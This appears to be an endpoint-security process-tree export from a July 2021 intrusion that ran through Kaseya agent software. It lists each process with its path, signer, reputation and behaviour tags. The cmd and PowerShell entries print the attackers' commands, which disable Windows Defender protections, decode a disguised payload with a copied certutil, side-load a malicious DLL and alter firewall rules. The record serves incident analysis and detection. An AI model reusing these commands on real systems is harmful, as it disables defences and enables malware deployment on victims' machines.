TREE VIEW (24 processes)
XXXXX: 0d09ee78-22c5-4ed8-877f-b40a28a4c344
7/2/2021, 3:16:04 PM

Process tree (parent executes child):

Boot
  agentmon.exe 3492
    logman.exe 4904
      conhost.exe 4892
    lua.exe 6928
      conhost.exe 6408
      lua.exe 9592
        conhost.exe 1440
      lua.exe 14832
        conhost.exe 8536
      lua.exe 7488
        conhost.exe 4852
    lua.exe 6888
      conhost.exe 7064
    kaseya.agentendpoint.exe 6760
      conhost.exe 1316
    cmd.exe 14460
      conhost.exe 2016
      ping.exe 14220
      powershell.exe 1232
      cert.exe 3500
      agent.exe 8964
        msmpeng.exe 14588
          netsh.exe 11812
            conhost.exe 6012

Process details:

agentmon.exe 3492
  Path: c:\program files (x86)\kaseya\vfmpc589317146091449\agentmon.exe
  Signed By: Kaseya Corporation
  Reputation: Benign
  Attack Start, Vertical Privilege Escalation; Uncommonly Used Port, System Privilege; Third-party Software...

kaseya.agentendpoint.exe 6760
  Path: c:\program files (x86)\kaseya\vfmpc589317146091449\kaseya.agentendpoint.exe
  Arguments: XXXXX
  Signed By: Kaseya Development, LLC
  Reputation: Benign
  Uncommonly Used Port, System Privilege; Execution through API, Third-party Software

conhost.exe 1316
  Path: c:\windows\system32\conhost.exe
  Arguments: 0xffffffff -ForceV1
  Signed By: Microsoft Windows
  Reputation: Benign
  System Privilege, Execution through API

logman.exe 4904
  Path: c:\windows\syswow64\logman.exe
  Signed By: Microsoft Windows
  Reputation: Benign
  System Privilege, Execution through API

conhost.exe 4892
  Path: c:\windows\system32\conhost.exe
  Arguments: 0xffffffff -ForceV1
  Signed By: Microsoft Windows
  Reputation: Benign
  System Privilege, Execution through API

lua.exe 6928
  Path: c:\program files (x86)\kaseya\vfmpc589317146091449\extensions\lua.exe
  Arguments: XXXXX
  Signed By: Kaseya Development, LLC
  Reputation: Benign
  System Privilege, Execution through API; Third-party Software

conhost.exe 6408
  Path: c:\windows\system32\conhost.exe
  Arguments: 0xffffffff -ForceV1
  Signed By: Microsoft Windows
  Reputation: Benign
  System Privilege, Execution through API

lua.exe 9592
  Path: c:\program files (x86)\kaseya\vfmpc589317146091449\extensions\lua.exe
  Arguments: XXXXX
  Signed By: Kaseya Development, LLC
  Reputation: Benign
  System Privilege, Execution through API; Third-party Software

conhost.exe 1440
  Path: c:\windows\system32\conhost.exe
  Arguments: 0xffffffff -ForceV1
  Signed By: Microsoft Windows
  Reputation: Benign
  System Privilege, Execution through API

lua.exe 14832
  Path: c:\program files (x86)\kaseya\vfmpc589317146091449\extensions\lua.exe
  Arguments: XXXXX
  Signed By: Kaseya Development, LLC
  Reputation: Benign
  System Privilege, Execution through API; Third-party Software

conhost.exe 8536
  Path: c:\windows\system32\conhost.exe
  Arguments: 0xffffffff -ForceV1
  Signed By: Microsoft Windows
  Reputation: Benign
  System Privilege, Execution through API

lua.exe 7488
  Path: c:\program files (x86)\kaseya\vfmpc589317146091449\extensions\lua.exe
  Arguments: XXXXX
  Signed By: Kaseya Development, LLC
  Reputation: Benign
  System Privilege, Execution through API; Third-party Software

conhost.exe 4852
  Path: c:\windows\system32\conhost.exe
  Arguments: 0xffffffff -ForceV1
  Signed By: Microsoft Windows
  Reputation: Benign
  System Privilege, Execution through API

lua.exe 6888
  Path: c:\program files (x86)\kaseya\vfmpc589317146091449\extensions\lua.exe
  Arguments: XXXXX
  Signed By: Kaseya Development, LLC
  Reputation: Benign
  System Privilege, Execution through API; Third-party Software

conhost.exe 7064
  Path: c:\windows\system32\conhost.exe
  Arguments: 0xffffffff -ForceV1
  Signed By: Microsoft Windows
  Reputation: Benign
  System Privilege, Execution through API

cmd.exe 14460
  Path: c:\windows\syswow64\cmd.exe
  Arguments: /c ping 127.0.0.1 -n 3217 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtec...
  Signed By: Microsoft Windows
  Reputation: Benign
  Dropped Executable, Windows Dir Lurking; Abnormal Behavior, System Privilege; File Deletion...

conhost.exe 2016
  Path: c:\windows\system32\conhost.exe
  Arguments: 0xffffffff -ForceV1
  Signed By: Microsoft Windows
  Reputation: Benign
  System Privilege, Execution through API

ping.exe 14220
  Path: c:\windows\syswow64\ping.exe
  Arguments: 127.0.0.1 -n 3217
  Signed By: Microsoft Windows
  Reputation: Benign
  System Privilege, Execution through API

powershell.exe 1232
  Path: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
  Arguments: Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetwo...
  Signed By: Microsoft Windows
  Reputation: Benign
  Windows Dir Lurking, Scripting; Dropped Script, System Privilege; File Deletion...

cert.exe 3500
  Path: c:\windows\cert.exe
  Arguments: -decode c:\kworking\agent.crt c:\kworking\agent.exe
  Signed By: Unsigned
  Reputation: Unknown
  Dropped Executable, Modify Registry; Unsigned Process, System Privilege; Execution through API...

agent.exe 8964
  Path: c:\kworking\agent.exe
  Signed By: PB03 TRANSPORT LTD.
  Reputation: Malware
  Trigger: mpsvc.dll
  Dropped Executable, Windows Dir Lurking; Dropped Dll, System Privilege; Execution through API...

msmpeng.exe 14588
  Path: c:\windows\msmpeng.exe
  Signed By: Microsoft Corporation
  Reputation: Benign
  System Privilege, Execution through API

netsh.exe 11812
  Path: c:\windows\syswow64\netsh.exe
  Arguments: advfirewall firewall set rule group="Network Discovery" new enable=Yes
  Signed By: Microsoft Windows
  Reputation: Benign
  Modify Registry, Dangerous Execution; Disabling Security Tools, Windows Firewall Tampering; System Privilege...

conhost.exe 6012
  Path: c:\windows\system32\conhost.exe
  Arguments: 0xffffffff -ForceV1
  Signed By: Microsoft Windows
  Reputation: Benign
  System Privilege, Execution through API

S-1-5-32-544